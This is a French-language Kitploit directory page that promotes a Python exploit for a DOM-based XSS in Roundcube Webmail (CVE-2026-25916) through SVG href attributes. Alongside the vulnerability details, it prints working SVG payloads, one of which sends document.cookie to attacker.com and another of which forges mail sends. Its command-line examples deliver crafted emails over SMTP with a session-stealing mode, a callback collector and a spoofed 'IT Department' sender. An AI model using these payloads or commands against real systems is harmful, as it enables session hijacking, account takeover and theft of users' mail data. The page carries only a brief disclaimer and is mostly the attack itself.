Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute — Exploit Python pour XSS basé sur le DOM dans Roundcube Webmail (CVE-2026-25916) via les attributs href SVG, permettant le détournement de session et l'exfiltration de données via des e-mails conçus. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebSécurité des Emails
GitHubmbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute

CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute

Exploit Python pour XSS basé sur le DOM dans Roundcube Webmail (CVE-2026-25916) via les attributs href SVG, permettant le détournement de session et l'exfiltration de données via des e-mails conçus.

Voir le dépôt
3110il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25916 : Exploit XSS DOM dans Roundcube Webmail

📋 Informations sur l'exploit

Titre de l'exploit : XSS DOM dans Roundcube Webmail via href SVG (CVE-2026-25916)
Auteur : Mohammed Idrees Banyamer
Contact : GitHub @mbanyamer | Instagram @banyamer_security
Pays : Jordanie
Date : 9 février 2026
CVE : CVE-2026-25916
Type : Cross-Site Scripting (XSS) basé sur le DOM
Plateforme : Application Web
Testé sur : Roundcube 1.6.8, Ubuntu 22.04
Score CVSS : 6.1 (Moyen)

🚨 Avertissement légal

⚠️ AVERTISSEMENT : Cet exploit est destiné uniquement à des fins éducatives et de tests autorisés.
Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite.
L'auteur n'est pas responsable de toute utilisation abusive ou activité illégale.

📖 Description de la vulnérabilité

Les versions de Roundcube Webmail antérieures à 1.6.9 contiennent une vulnérabilité XSS basée sur le DOM dans la gestion des SVG. L'application ne parvient pas à assainir correctement les attributs et dans les éléments SVG, permettant l'exécution de JavaScript via des e-mails spécialement conçus.

href
xlink:href

Versions concernées : Roundcube Webmail < 1.6.9
Corrigé dans : Version 1.6.9 (Commit 26d7677)
CWE : CWE-79 - Neutralisation incorrecte des entrées lors de la génération de pages Web
Vecteur d'attaque : À distance via e-mail
Impact : Détournement de session, prise de contrôle du compte, exfiltration de données

🔧 Détails techniques

La vulnérabilité existe dans rcube_washtml.php où les attributs href dans les éléments SVG n'étaient pas correctement validés :

root@kitploit:~
<!-- Éléments SVG vulnérables -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
root@kitploit:~
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u [email protected] \
  -w app_password \
  -r [email protected] \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
Télécharger l’outil